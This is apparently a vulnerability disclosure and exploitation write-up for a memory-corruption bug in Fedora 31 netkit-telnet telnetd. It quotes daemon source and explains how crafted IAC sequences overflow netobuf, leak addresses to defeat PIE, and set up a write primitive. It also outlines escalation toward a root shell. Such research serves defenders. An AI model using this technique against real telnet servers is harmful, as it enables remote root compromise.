It’s not worth doing something unless you were doing something that someone, somewhere, would much rather you weren’t doing.

Sir Terence David John Pratchett

1 Introduction

In this post we will present a vulnerability in the Fedora 31 version of netkit-telnet-0.17 telnetd which has been present for a long time, and which is remotely exploitable. Other Linux distributions or Unix systems may or may not be vulnerable, however the aim of this post is to present an interesting vulnerability and corresponding exploit and not to create a taxonomy of vulnerable versions. We will leave this to others.

The exploit presented is a proof-of-concept one: it will show a working basis that defeats the default Fedora 31 mitigations such as PIE, ASLR, and non-executable pages. The exploit will however not bypass SELinux, and further research is needed to do so. A proper exploit would also need to be far more reliable. We believe both can be done, but to reduce the amount of time spent on weaponizing a now disclosed vulnerability, and to mitigate the impact of installations that – god forbid – still run telnetd, we will also leave this to others.

2 Source code overview

As the vulnerability and exploitation are somewhat involved, we will discuss the telnetd code base in a manner that first provides understanding of the internals before we switch to discussing the vulnerability and expoitation. To keep this document more or less clear, not all parts of the source code have been listed here. For those who want to pursue a deeper understanding of the code, the Fedora 31 netkit-telnet-0.17 tarball is available here.

2.1 Glossary of important names, variables, and conventions

The telnet protocol is outlined in RFC 854, but for readers that are not keen on reading through this document, we will summarize the most frequently used abbrevations below.

IAC: Interpret as Command. An escape character that tells the next sequence is a command sequence rather than data.
AO: Abort output. A command that discards further terminal output of the current running process.
SB: Suboption Begin. A command that marks the beginning of a suboption sequence.
SE: Suboption End. A command that marks the end of a suboption sequence.

The source code contains many global variables that are frequently used. To ease the reading burden, below the reader can find a glossary of the ones we will encounter during our discussion.

int net: the client socket, which data is read from and sent to.
char netibuf[BUFSIZ]: the network input buffer. Data read from the client is stored here.
int ncc: the number of bytes read from the client into netibuf.
char *netip: the network input pointer. Tracks where in netibuf we are processing.
char netobuf[BUFSIZE+NETSLOP]: the network output buffer. Data to send to the client is stored here.
char *nbackp: marks the start of unsent data in netobuf.
char *nfrontp: marks where to add data to netobuf.
char *neturg: marks a single byte to be sent as urgent data in netobuf.
char ptyibuf[BUFSIZ]: the pty input buffer. Data read from the login process pty is stored here.
int pcc: the number of bytes read from the pty into ptyibuf.
char *ptyip: the pty input pointer. Tracks where in ptyibuf we are processing.
char ptyobuf[BUFSIZ+NETSLOP]: the pty output buffer. Data to be sent to the login process pty is stored here.
char *pbackp: marks the start of unsent data in ptyobuf.
char *pfrontp: marks where to add data to ptyobuf.

Finally, we would like to draw attention to some conventions used throughout this document. We will denote the integer range 1,…,10 using the inclusive [1,10] notation, the exclusive (0,11) notation, or a combination of the two such as [1,11).

2.2 The main processing loop

We’ll discuss the vulnerability in a top-down fashion, and therefore we will begin by looking at the function that drives network communication after a client connection has been accepted.

The processing of a client network request to telnetd is handled in the ttloop function. In spite of it being named ttloop, this function is in fact a single iteration over receiving and processing client data. On line 148 client input is read into netibuf and the number of bytes read is kept in the global int variable ncc. The current instance of the daemon will terminate immediately on read errors or an EOF from the client. If data is read netip is initialized to the start of netibuf at 157 and the main state machine telrcv is called at 158. Note that telrcv will decrement ncc upon consuming network input, and at 159 if there is still data remaining afterwards the pty output buffer will be reset and telrcv will be called again. We will see later that the only way telrcv returns with ncc > 0 is if ptyobuf would overflow.

void
ttloop(void)
{

    DIAG(TD_REPORT, netoprintf("td: ttloop\r\n"););
                     
    if (nfrontp-nbackp) {
        netflush();
    }
    ncc = read(net, netibuf, sizeof(netibuf));
    if (ncc < 0) {
        syslog(LOG_INFO, "ttloop: read: %m\n");
        exit(1);
    } else if (ncc == 0) {
        syslog(LOG_INFO, "ttloop: peer died: EOF\n");
        exit(1);
    }
    DIAG(TD_REPORT, netoprintf("td: ttloop read %d chars\r\n", ncc););
    netip = netibuf;
    telrcv();                   /* state machine */
    if (ncc > 0) {
        pfrontp = pbackp = ptyobuf;
        telrcv();
    }
}  /* end of ttloop */

2.3 The main state machine

The telnetd state machine that processes network input and drives the protocol actions is defined in the telrcv function.

Note that the source tarball contains preprocessor conditionals for ENCRYPT and LINEMODE. These are not defined in the default Fedora 31 build, and therefore have been removed from the source code listing.

As long as we still have network input at 86, then a byte is stored in c at 88 and ncc is adjusted to reflect the consumed byte at 89. We will not discuss the entire state machine, but have mainly listed the code below to refer to in later parts of this document. For now take note of how the IAC AO sequence is handled, in particular the netclear call.

void telrcv(void) {
    register int c;
    static int state = TS_DATA;

    while (ncc > 0) {
        if ((&ptyobuf[BUFSIZ] - pfrontp) < 2) break;
        c = *netip++ & 0377;
        ncc--;

        switch (state) {
         case TS_CR:
             state = TS_DATA;
             /* Strip off \n or \0 after a \r */
             if ((c == 0) || (c == '\n')) {
                 break;
             }
             /* FALL THROUGH */

         case TS_DATA:
             if (c == IAC) {
                 state = TS_IAC;
                 break;
             }
             /*
              * We now map \r\n ==> \r for pragmatic reasons.
              * Many client implementations send \r\n when
              * the user hits the CarriageReturn key.
              *
              * We USED to map \r\n ==> \n, since \r\n says
              * that we want to be in column 1 of the next
              * printable line, and \n is the standard
              * unix way of saying that (\r is only good
              * if CRMOD is set, which it normally is).
              */
             if ((c == '\r') && his_state_is_wont(TELOPT_BINARY)) {

                     state = TS_CR;
                 }
             }
             *pfrontp++ = c;
             break;

         case TS_IAC:
         gotiac:
             switch (c) {

                 /*
                  * Send the process on the pty side an
                  * interrupt.  Do this with a NULL or
                  * interrupt char; depending on the tty mode.
                  */
              case IP:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  interrupt();
                  break;
              case BREAK:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  sendbrk();
                  break;

                  /*
                   * Are You There?
                   */
              case AYT:
                 DIAG(TD_OPTIONS,
                      printoption("td: recv IAC", c));
                  recv_ayt();
                  break;

                  /*
                   * Abort Output
                   */
              case AO:
                  {
                      DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                      ptyflush();       /* half-hearted */
                      init_termbuf();

                      if (slctab[SLC_AO].sptr &&
                          *slctab[SLC_AO].sptr != (cc_t)(_POSIX_VDISABLE))
                      {
                          *pfrontp++ =
                              (unsigned char)*slctab[SLC_AO].sptr;
                      }

                      netclear();       /* clear buffer back */
                      *nfrontp++ = (char)IAC;
                      *nfrontp++ = (char)DM;
                      neturg = nfrontp-1; /* off by one XXX */
                      DIAG(TD_OPTIONS, printoption("td: send IAC", DM));
                      break;
                  }

                  /*
                   * Erase Character and
                   * Erase Line
                   */
              case EC:
              case EL:
                 {
                     cc_t ch;
                     DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                     ptyflush();        /* half-hearted */
                     init_termbuf();
                     if (c == EC) ch = *slctab[SLC_EC].sptr;
                     else ch = *slctab[SLC_EL].sptr;
                     if (ch != (cc_t)(_POSIX_VDISABLE))
                         *pfrontp++ = (unsigned char)ch;
                     break;
                 }

                  /*
                   * Check for urgent data...
                   */
              case DM:
                  DIAG(TD_OPTIONS, printoption("td: recv IAC", c));
                  SYNCHing = stilloob(net);
                  settimer(gotDM);
                  break;

                  /*
                   * Begin option subnegotiation...
                   */
              case SB:
                  state = TS_SB;
                  SB_CLEAR();
                  continue;

              case WILL:
                  state = TS_WILL;
                  continue;

              case WONT:
                  state = TS_WONT;
                  continue;

              case DO:
                  state = TS_DO;
                  continue;

              case DONT:
                  state = TS_DONT;
                  continue;

              case EOR:
                  if (his_state_is_will(TELOPT_EOR)) doeof();
                  break;

                  /*
                   * Handle RFC 10xx Telnet linemode option additions
                   * to command stream (EOF, SUSP, ABORT).
                   */
              case xEOF:
                  doeof();
                  break;

              case SUSP:
                  sendsusp();
                  break;

              case ABORT:
                  sendbrk();
                  break;

              case IAC:
                 *pfrontp++ = c;
                  break;
             }
             state = TS_DATA;
             break;

         case TS_SB:
             if (c == IAC) {
                 state = TS_SE;
             }
             else {
                 SB_ACCUM(c);
             }
             break;

         case TS_SE:
             if (c != SE) {
                 if (c != IAC) {
                                /*
                                 * bad form of suboption negotiation.
                                 * handle it in such a way as to avoid
                                 * damage to local state.  Parse
                                 * suboption buffer found so far,
                                 * then treat remaining stream as
                                 * another command sequence.
                                 */

                                /* for DIAGNOSTICS */
                     SB_ACCUM(IAC);
                     SB_ACCUM(c);
                     subpointer -= 2;

                     SB_TERM();
                     suboption();
                     state = TS_IAC;
                     goto gotiac;
                 }
                 SB_ACCUM(c);
                 state = TS_SB;
             }
             else {
                 /* for DIAGNOSTICS */
                 SB_ACCUM(IAC);
                 SB_ACCUM(SE);
                 subpointer -= 2;

                 SB_TERM();
                 suboption();   /* handle sub-option */
                 state = TS_DATA;
             }
             break;

         case TS_WILL:
             willoption(c);
             state = TS_DATA;
             continue;

         case TS_WONT:
             wontoption(c);
             state = TS_DATA;
             continue;

         case TS_DO:
             dooption(c);
             state = TS_DATA;
             continue;

         case TS_DONT:
             dontoption(c);
             state = TS_DATA;
             continue;

         default:
             syslog(LOG_ERR, "telnetd: panic state=%d\n", state);
             printf("telnetd: panic state=%d\n", state);
             exit(1);
        }
    }
}

A quick overview of the telrcv state machine is shown below.

2.3.1 Option handling

An important part of the telnet protocol is option negotiation. This is done through IAC DO, IAC DONT, IAC WILL, and IAC WONT command sequences. The meaning of these sequences is as follows:

DO: requests the peer to use a certain negotiable option.
DONT: requests the peer to not use a certain negotiable option.
WILL: notifies the peer we will use a certain negotiable option.
WONT: notifies the peer we will not use a certain negotiable option.

Within the scope of our discussion, we will use only use IAC DO commands, which result in a call to dooption in the state machine. The code can be found below, and the most important thing to note is that unknown option codes will be replied to with send_wont which repeats the requested option code. This means that a sequence such as IAC DO U, where U is an unknown option, will be replied to with IAC WONT U.

void dooption(int option) {
    int changeok = 0;

    /*
     * Process client input.
     */

    DIAG(TD_OPTIONS, printoption("td: recv do", option));

    if (will_wont_resp[option]) {
        will_wont_resp[option]--;
        if (will_wont_resp[option] && my_state_is_will(option))
            will_wont_resp[option]--;
    }
    if ((will_wont_resp[option] == 0) && (my_want_state_is_wont(option))) {
        switch (option) {
        case TELOPT_ECHO:

            {
                init_termbuf();
                tty_setecho(1);
                set_termbuf();
            }
            changeok++;
            break;

        case TELOPT_BINARY:
            init_termbuf();
            tty_binaryout(1);
            set_termbuf();
            changeok++;
            break;

        case TELOPT_SGA:

            turn_on_sga = 0;

            changeok++;
            break;

        case TELOPT_STATUS:
            changeok++;
            break;

        case TELOPT_TM:
            /*
             * Special case for TM.  We send a WILL, but
             * pretend we sent a WONT.
             */
            send_will(option, 0);
            set_my_want_state_wont(option);
            set_my_state_wont(option);
            return;

        case TELOPT_LOGOUT:
            /*
             * When we get a LOGOUT option, respond
             * with a WILL LOGOUT, make sure that
             * it gets written out to the network,
             * and then just go away...
             */
            set_my_want_state_will(TELOPT_LOGOUT);
            send_will(TELOPT_LOGOUT, 0);
            set_my_state_will(TELOPT_LOGOUT);
            (void)netflush();
            cleanup(0);
            /* NOT REACHED */
            break;

        case TELOPT_LINEMODE:
        case TELOPT_TTYPE:
        case TELOPT_NAWS:
        case TELOPT_TSPEED:
        case TELOPT_LFLOW:
        case TELOPT_XDISPLOC:
        case TELOPT_ENVIRON:
        default:
            break;
        }
        if (changeok) {
            set_my_want_state_will(option);
            send_will(option, 0);
        }
        else {
            will_wont_resp[option]++;
            send_wont(option, 0);
        }
    }
    set_my_state_will(option);
}

2.4 Basis of the vulnerability

The netclear and nextitem functions can scan past the end of netobuf and corrupt memory in the data segment under certain conditions. We will not yet discuss whether these conditions can be met, as this is complicated, but first focus on explaining the issue in these two functions.

2.4.1 The netclear() function

The netclear function, as depicted below, reworks the network output buffer netobuf to remove data that was already sent, as well as unwanted items. An item here is either a single data byte, or an IAC command sequence of two or more bytes. The nextitem function is used to partition netobuf into items. We will discuss the implementation of this function later.

At 277 thisitem is set to netobuf and at 280 items are skipped as long as they are smaller than nbackp. As mentioned before, nbackp points to the location in netobuf that has not already been sent over the network. Anything before nbackp can therefore be discarded. At 289 good is set to netobuf as well. This is the destination pointer for copying netobuf data that is retained, so this copy will be performed inline.

At 292 items will be processed from thisitem while it is smaller than nfrontp. Items that do not match the wewant macro will be skipped at 305. An item that does match the wewant macro will first be coalesced to adjacent wanted items in the loop at 297 and then copied back to good at 301.

void netclear(void)
{
    register char *thisitem, *next;
    char *good;
#define wewant(p)       ((nfrontp > p) && ((*p&0xff) == IAC) && \
                                ((*(p+1)&0xff) != EC) && ((*(p+1)&0xff) != EL))

#if     defined(ENCRYPT)
    thisitem = nclearto > netobuf ? nclearto : netobuf;
#else
    thisitem = netobuf;
#endif

    while ((next = nextitem(thisitem)) <= nbackp) {
        thisitem = next;
    }

    /* Now, thisitem is first before/at boundary. */

#if     defined(ENCRYPT)
    good = nclearto > netobuf ? nclearto : netobuf;
#else
    good = netobuf;     /* where the good bytes go */
#endif

    while (nfrontp > thisitem) {
        if (wewant(thisitem)) {
            int length;

            next = thisitem;
            do {
                next = nextitem(next);
            } while (wewant(next) && (nfrontp > next));
            length = next-thisitem;
            bcopy(thisitem, good, length);
            good += length;
            thisitem = next;
        } else {
            thisitem = nextitem(thisitem);
        }
    }

    nbackp = netobuf;
    nfrontp = good;             /* next byte to be sent */
    neturg = 0;
}  /* end of netclear */

2.4.2 The nextitem() function

The nextitem function is meant to find the item starting after the item pointed to by current.

The function performs no bounds checking, and can return pointers past the end of the region current. Offsets should be constrained to not extend past the end of the current region at 232, 246, and most notably 240. The latter over-indexation is the most dangerous one, as it means the function will keep scanning memory until it finds a IAC, SE sequence in memory and return a pointer to the byte after it.

static
char *
nextitem(char *current)
{
    if ((*current&0xff) != IAC) {
        return current+1;
    }
    switch (*(current+1)&0xff) {
    case DO:
    case DONT:
    case WILL:
    case WONT:
        return current+3;
    case SB:            /* loop forever looking for the SE */
        {
            register char *look = current+2;

            for (;;) {
                if ((*look++&0xff) == IAC) {
                    if ((*look++&0xff) == SE) {
                        return look;
                    }
                }
            }
        }
    default:
        return current+2;
    }
}  /* end of nextitem */

2.4.3 Data segment corruption idea

Given the code discussed above, if we could get netobuf to contain an opening IAC SB sequence but not a closing IAC SE sequence, the nextitem function would scan past the end of netobuf to find the closing sequence. In case this sequence is not present, this would result in accessing unmapped memory and thus a segmentation fault. However, in case such a sequence exists past the end of netobuf, the loop at 297 would terminate due to next being larger than nfrontp (which should not point past the end of netobuf), and result in length being too large. Depending on the position of good in netobuf, this can result in an out of bounds read (if length fits at good and just overindexes thisitem) or an out of bounds read and write (if length does not fit at good).

2.5 Network output buffer control

We have seen previously that we have a data segment overflow if we can create an IAC SB sequence in netobuf without a terminating IAC SE sequence. In order to do so, we will have to look more closely at primitives we have to control this buffer.

First we will discuss the ways in which we can have the daemon add data to the buffer and what parts of that data we control. Then we will look at how these functions work internally, and discuss how the buffer is flushed when full and how urgent data is handled. Finally we will use everything discussed so far to create an unterminated IAC SB sequence in the network output buffer.

2.5.1 Primitives adding data to the network output buffer

We cannot add arbitrary data to netobuf directly. Instead the daemon will add to it based on the network input we provided in netibuf. To create a situation where we have an unterminated IAC SB sequence in netobuf, we need to see to what extent we can control parts of the data that is added to netobuf.

There are several ways in which data can be added to netobuf in the source code. The output_data and output_datalen functions in utility.c can be used to do so, as well as the netoprintf macro in ext.h. Finally the location the nfrontp pointer refers to is directly written to in state.c (handling the IAC AO sequence) and telnetd.c (data read from the pty).

#define netoprintf output_data
int     output_data(const char *, ...) __attribute((format (printf, 1, 2))); 
void    output_datalen(const char *, int);

We will look at the call sites of netoprintf, output_data, and output_datalen. We can see the netoprintf macro is a simple wrapper around the output_data function. It is called in a lot of places in the source tree, but a lot of these places are for diagnostics. This means the build-time definition DIAGNOSTICS will have to be set, and telnetd itself would have to have been started with the -D command line option. This is not typically the case, so we will not consider such use. Below are the call-sites we identified:

state.c

send_do, send_dont, send_will, and send_wont. Each of these add 3 bytes to netobuf, of which we control the last byte.

IAC AO handling at in telrcv.

termstat.c

Only for LINEMODE defined compilations. This is not the case for Fedora 31.

telnetd.c

Once for every option in response to the TELOPT_TSPEED, TELOPT_XDISPLOC, TELOPT_ENVIRON, and TELOPT_TTYPE telnet options if the client supports them.

In the _gettermname function if the client supports TELOPT_TTYPE.

When writing the IAC DM sequence in the pty handling main loop.

When flow control is supported by the client in the pty handling main loop.

In the recv_ayt function. This is used in response to IAC AYT requests, and is interesting as it results in amplification.

slc.c

In the end_slc function used when handling the TELOPT_LINEMODE option in state.c. This needs a LINEMODE defined build, which is not the case on Fedora 31.

Out of all these call sites, we have identified two that we can use for the development of the exploit in this article. We will rely on the send_wont call in dooption and the IAC DM addition at nfrontp in telrcv. Note that in the latter case there is no direct check to ensure this will not access memory past the end of netobuf. It is possible to crash the daemon using this, but that is outside the scope of the current document. The reason we picked these two call sites will become apparent later on. For now, remember that we will use two primitives for adding data to netobuf, one which will add a 3 byte IAC WONT sequence and then a byte we can control - provided it is not a valid option. And one which will add a 2 byte IAC DM sequence.

With these two primitives in mind, we will further look into how output data is buffered in netobuf and how a shortage of buffer space is handled.

2.5.2 Output function internals

The output_data function is a simple wrapper around the output_datalen function that support format strings. It is listed below for completeness.

int
output_data(const char *format, ...)
{
        va_list args;
        int len;
        char *buf;

        va_start(args, format);
        if ((len = vasprintf(&buf, format, args)) == -1)
                return -1;
        output_datalen(buf, len);
        va_end(args);
        free(buf);
        return (len);
}

The output_datalen function itself does most of the work, and is more interesting. The source tarball shows that netobuf is BUFSIZE+NETSLOP bytes big, which is typically 8256 bytes. nfrontp points to the position in netobuf where data will be added to, so nfrontp - netobuf is the size of netobuf that is currently in use.

The while loop at 85 will partition the input in buf into chunks of at most BUFSIZE bytes and process these chunks in order. In case there is not enough space available to copy the current chunk into netobuf, the netflush function will be called to create space at 88, and as flushing will adjust nfrontp the remaining space is also recalculated.

The chunk is then copied into the network output buffer at 94 and the related variables are updated.

void    
output_datalen(const char *buf, int len)
{       
        int remaining, copied;
        
        remaining = BUFSIZ - (nfrontp - netobuf);
        while (len > 0) {
                /* Free up enough space if the room is too low*/
                if ((len > BUFSIZ ? BUFSIZ : len) > remaining) {
                        netflush();
                        remaining = BUFSIZ - (nfrontp - netobuf);
                }

                /* Copy out as much as will fit */
                copied = remaining > len ? len : remaining;
                memmove(nfrontp, buf, copied);
                nfrontp += copied;
                len -= copied;
                remaining -= copied;
                buf += copied;
        }
        return;
}

What remains is a closer look at the netflush function, as this handles what happens when there is not enough buffer space available. The attentive reader may already have noticed that remaining at 89 is recalculated rather than reset to BUFSIZ, which hints at the fact that netflush may not drain the network output buffer completely when called.

2.5.3 netflush internals

The netflush implementation can be found below. If there is data that has not been written yet in netobuf – that is, all data between nbackp and nfrontp – it will be handled in the conditional code block at 325. When no urgent data has been added to the network output buffer, data starting at nbackp is written to the network socket – see 362. The amount sent is recorded, and nbackp is adjusted upward to reflect this data has been sent at 376. If nfrontp is equal to nbackp all data will have been drained, and the network output buffer state is reinitialized at 384. Note that netobuf will not be fully drained if send returns a smaller value than was requested.

We have not yet discussed the handling of urgent data, which is done at 352 if neturg is not NULL. Recall that neturg is a special purpose pointer within netobuf which marks the area of urgent data. Just as [nbackp, nfrontp) is the range of network output data that is yet to be written to the network socket, [nbackp, neturg) is the range of urgent data that is yet to be written to the network socket. Note that netobuf will not be fully drained if there is both urgent and normal data in netobuf, as the send call will only attempt to drain the urgent data.

void
netflush(void)
{
    int n;

    if ((n = nfrontp - nbackp) > 0) {

#if 0
        /* XXX This causes output_data() to recurse and die */
        DIAG(TD_REPORT,
            { netoprintf("td: netflush %d chars\r\n", n);
              n = nfrontp - nbackp;  /* update count */
            });
#endif

#if     defined(ENCRYPT)
        if (encrypt_output) {
                char *s = nclearto ? nclearto : nbackp;
                if (nfrontp - s > 0) {
                        (*encrypt_output)((unsigned char *)s, nfrontp-s);
                        nclearto = nfrontp;
                }
        }
#endif
        /*
         * if no urgent data, or if the other side appears to be an
         * old 4.2 client (and thus unable to survive TCP urgent data),
         * write the entire buffer in non-OOB mode.
         */
        if ((neturg == 0) || (not42 == 0)) {
            n = write(net, nbackp, n);  /* normal write */
        } else {
            n = neturg - nbackp;
            /*
             * In 4.2 (and 4.3) systems, there is some question about
             * what byte in a sendOOB operation is the "OOB" data.
             * To make ourselves compatible, we only send ONE byte
             * out of band, the one WE THINK should be OOB (though
             * we really have more the TCP philosophy of urgent data
             * rather than the Unix philosophy of OOB data).
             */
            if (n > 1) {
                n = send(net, nbackp, n-1, 0);  /* send URGENT all by itself */
            } else {
                n = send(net, nbackp, n, MSG_OOB);      /* URGENT data */
            }
        }
    }

         if (n == -1) {
                if (errno == EWOULDBLOCK || errno == EINTR)
                  return;
                cleanup(0);
                /* NOTREACHED */
         }

    nbackp += n;
#if     defined(ENCRYPT)
    if (nbackp > nclearto)
        nclearto = 0;
#endif
    if (nbackp >= neturg) {
        neturg = 0;
    }
    if (nbackp == nfrontp) {
        nbackp = nfrontp = netobuf;
#if     defined(ENCRYPT)
        nclearto = 0;
#endif
    }
    return;
}  /* end of netflush */

2.6 Triggering the vulnerability

The methods to control netobuf content as described in the previous section are enough to craft a IAC SB sequence without a terminating IAC SE sequence in the content. We have several ways to make this happen, and will discuss the two most important ones. This is easiest to demonstrate by example, which we will do in the next sections.

Before doing so, we need to point out that the state machine will handle IAC DO sequences by calling dooption. Without looking at the dooption code, we note that an unknown option byte will always be replied to using send_wont resulting in a IAC WONT reply sequence. More specifically, an input sequence such as IAC DO SB would be replied to with an IAC WONT SB sequence, and an input sequence such as IAC DO IAC would be replied to with an IAC WONT IAC sequence.

2.6.1 Trigger using short writes

The first way to trigger the vulnerability is by having write in netflush return before having written all data. We will discuss what happens here below in a simplified manner.

Suppose we have populated the prefix of netobuf with IAC WONT SB by sending IAC DO SB requests. We have then padded out the rest of the buffer up to the last byte. This leads to the following configuration:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |       |
++------+-------+-------+-------+-------++------+
 |                                       |
 +>nbackp                                +>nfrontp

If we send an IAC DO IAC request, a call to send_wont will call output_datalen to add the IAC WONT IAC sequence to netobuf. netflush will be called to make space for these 3 bytes. Suppose write sends less data than requested, let’s say 2 bytes in this case, the situation then becomes:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |       |
+-------+-------++------+-------+-------++------+
                 |                       |
                 +>nbackp                +>nfrontp

At this point output_datalen would move past the netflush and recalculate remaining to be 1 and copy 1 byte of data to nfrontp. The situation after the copy is as follows:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |  IAC  |
+-------+-------++------+-------+-------+-------++
                 |                               |
                 +>nbackp                        +>nfrontp

As there are still 2 bytes of data to be copied by output_datalen, netflush will be called again. If this time write will send out all remaining data, we end up with the following situation after the netflush:

 netobuf
+-------+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  ...  |  8190 |  8191 |
+-------+-------+-------+-------+-------+-------+
|  IAC  |  WONT |   SB  |  ...  |  ...  |  IAC  |
++------+-------+-------+-------+-------+-------+
 |
 +>nfrontp
 +>nbackp

Finally output_datalen would copy the remaining 2 bytes of the IAC WONT IAC triplet, leading to:

 netobuf
+-------+-------+-------+-------+-------+
|     0 |     1 |     2 |  8190 |  8191 |
+-------+-------+-------+-------+-------+
|  WONT |  IAC  |   SB  |  ...  |  IAC  |
++------+-------++------+-------+-------+
 |               |
 +>nbackp        +>nfrontp

If this buffer were to be processed by netclear the call to nextitem would skip the WONT at index 0, and start processing the IAC we injected at index 1. As nextitem can over-index, if the byte at index 2 is a SB byte, we would end up with the situation we desired, that is, a IAC SB sequence in netobuf without a terminating IAC SE sequence.

2.6.2 Trigger using urgent data

Control over the non-blocking write return value is complicated, because it depends on several network related factors outside our control, related variables here are the transmit buffer size, the MTU, the TCP MSS, whether or not TSO is used and so on. This situation is exacerbated by a timer telnetd will use to close the connection after a certain amount of time. We need this time to fill the remote transmit buffer, making this even more convoluted.

Thankfully, there is another way in order to have netflush not drain all data, which involves the use of the neturg pointer. The process is outlined below.

We start with a situation similar as before, where we have sent a IAC DO SB request. This time we follow it by an IAC AO request, and then padding requests to increase nfrontp to 8191. The IAC AO is answered by a IAC DM sequence as we have seen before in telrcv and sets neturg to the address of the DM byte in netobuf.
We send a IAC DO IAC request. Remember this will result in a call to send_wont producing IAC WONT IAC which ends up in output_datalen to add this triplet to netobuf. netflush will be called to make space for these 3 bytes. However, because neturg is not 0 netflush will now use send instead of write and only drain 3 bytes of data.
Now output_datalen will recalculate remaining to be 1, and copy 1 byte of data into netobuf.
At this point netflush will be called again, which will send 1 byte of urgent data. Note that this will increase nbackp to neturg which in turn leads neturg to be set to 0.
As no space has been freed at the tail of the buffer, 0 bytes will be copied, and netflush will be called again. Here it will use a regular blocking write and drain all the remaining data.
The remaining WONT IAC bytes will now be written to netobuf, leading to the sequence WONT IAC SB at the beginning.

This is the configuration we are looking for in order to trigger the bug. The animation below illustrates the previous description:

3 Exploitation

Now that we have seen that we can indeed create a situation in netkit-telnetd that leads to memory corruption, we will investigate exploitability. In doing so we will develop a rudimentary proof-of-concept exploit that will spawn a root shell on a default Fedora 31 installation running netkit-telnetd. This proof of concept will not work against machines that have SELinux enabled, although we are fairly positive a working exploit can be developed against SELinux targets. We will briefly outline some ideas on this in our conclusion.

3.1 Copy primitive control

netkit-telnetd uses a huge number of global or file scoped variables, which includes netobuf which we overflow. The first issue we need to deal with is ensuring nextitem will find a IAC SE pair in order to survive. A tentative glance at the data section layout shows us the following sizes and names:

+---------+--------+-------+---------+--------+-----+-----+---------+
|    8256 |    304 |     8 |       8 |      8 |   4 |  20 |    8192 |
+---------+--------+-------+---------+--------+-----+-----+---------+
| netobuf | slctab | netip | pfrontp | neturg | net | pad | netibuf |
+---------+--------+-------+---------+--------+-----+-----+---------+

It seems opportune to use netibuf to embed the terminating IAC SE sequence. We can do this by simply sending a IAC SE pair, as telrcv will not add anything to netobuf when it encounters an unexpected command byte in TS_IAC state.

If this IAC SE sequence is at the start of netibuf and we use the buffer layout described in the previous section, we would end up copying the range [&netobuf[1], &netibuf[1]] to &netbuf[0]. This because the first WONT byte in netobuf will not be wanted, and good will point to the start of the buffer. This is a rather inflexible primitive, so the first thing we will investigate is whether we can exert any control over both the destination and the size of the copy.

3.1.1 Destination and size control

In order to control the destination of the copy, we need to control good. Respectively, to control the size of the copy we need to control at which offset in netobuf the IAC SE sequence occurs. Using the trigger we discussed, the WONT IAC sequence will always be written at the beginning of netobuf. Altough this cannot be avoided, remember that the real issue is the state desynchronization this creates by turning an IAC WONT SB sequence into a WONT IAC SB sequence.

We can propagate this state desynchronization further down netobuf by observing that just like we turned the IAC WONT SB sequence into WONT IAC SB we can turn the IAC WONT SB IAC WONT SB sequence into WONT IAC IAC WONT IAC SB sequence. Furthermore, this can be generalized, where we can turn a sequence with n-repetitions of IAC WONT SB into a sequence of a single WONT IAC, then (n-1) IAC WONT IAC repetitions, and finally a SB byte. Note that good will not be updated up until the IAC SB sequence, as the other sequences are not wanted.

This means that by adding more or fewer IAC WONT SB sequences and corresponding IAC WONT IAC sequences after desynchronization we control the position of thisitem within netobuf and also length in multiples of 3 at the time of the bcopy.

First the situation we created in netobuf prior to sending two IAC WONT IAC sequences.

 netobuf
+------+------+------+------+------+------+------+------+------+
|    0 |    1 |    2 |    3 |    4 |    5 |  ... | 8190 | 8191 |
+------+------+------+------+------+------+------+------+------+
|  IAC | WONT |  SB  |  IAC | WONT |  SB  |  ... |  ... |      | 
++-----+------+------+------+------+------+------+------++-----+
 |                                                       |
 +>nbackp                                                +>nfrontp

After these two IAC WONT IAC sequences have been added to netobuf the situation is as below. Note that when the buffer is processed the IAC IAC sequence will be treated as data, and the IAC SB sequence will result in the condition we were looking for, but this further into netobuf.

 netobuf
+------+------+------+------+------+------+------+------+------+
|    0 |    1 |    2 |    3 |    4 |    5 |  ... | 8190 | 8191 |
+------+------+------+------+------+------+------+------+------+
| WONT |  IAC |  IAC | WONT |  IAC |  SB  |  ... |  ... |  IAC |
++-----+------+------+------+------++-----+------+------+------+
 |                                  |
 +>nbackp                           +>nfrontp

3.2 Limited data segment infoleak

By controlling the source and length of the copy, we can start copying from the tail of netobuf until and including &netibuf[2] to the start of netobuf. This range contains the data we have seen previously. When netobuf is next flushed, this copied data will be written to our client socket.

This will include the netip pointer, which is guaranteed to point somewhere in netibuf. Using this leaked pointer and the knowledge of how much data we sent ourselves, we can calculate the start address of netibuf. We know that netibuf is two pages big, and we know whether netip is within the first or the second page based on how much data we sent was processed at the time of the information leak. By rounding the leaked netip value down to a page boundary and if necessary subtracting one page, we know the exact address of netibuf in memory. This bypasses PIE, and allows us to determine the other addresses of variables in the data segment if we know their distance from netibuf.

3.3 Write primitive

The next thing we’re interested in is a write primitive. One of the variables we leaked was pfrontp, which makes a good target as controlling it allows us to write arbitrary data to addresses before &ptyobuf[BUFSIZ-2]. This allows us to corrupt arbitrary data in the data segment, so this primitive can easily be built upon to create more flexible information leaks and write primitives.

3.4 Escalation of privileges

The information leak, in combination with the write primitive to the data segment we discussed have tremendous potential for finding further primitives for escalation. Many of the simpler ones are context dependent, but we have included some ideas below.

Corrupt the environ pointer and add LD_PRELOAD before login is executed. This will work well on systems where the attacker has local access.
Target the doopt, dont, will, or wont format strings for leaking or write primitives if fortify so allows.
Investigate more flexible write primitives and information leaks.
Overwrite loginprg and aim for command injection.

3.5 Command injection

One of the simplest ideas is seeing if we can influence how telnetd spawns the login process and control that. There are some drawbacks to this approach, in particular SELinux allowing in.telnetd to only execute the login binary, but for a proof of concept it is suitable due to its simplicity.

